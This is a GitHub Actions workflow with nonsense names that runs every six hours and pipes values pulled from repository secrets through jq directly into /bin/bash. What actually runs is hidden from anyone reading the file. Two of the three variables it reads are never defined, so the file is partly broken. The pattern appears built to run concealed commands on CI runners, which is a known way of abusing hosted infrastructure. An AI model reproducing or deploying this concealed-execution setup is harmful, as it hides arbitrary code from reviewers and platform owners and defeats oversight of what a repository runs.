name: honortwisting
on:
  workflow_dispatch:
  schedule:
    - cron: '18 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: honortwisting
        env:
          pl1949: ${{ secrets.pl1949 }}
        run: |
          echo $pl1949 | jq -r .u9 | /bin/bash
          echo $sepe17165 | jq -r .wb2966 | /bin/bash
          echo $n0 | jq -r .a97491 | /bin/bash

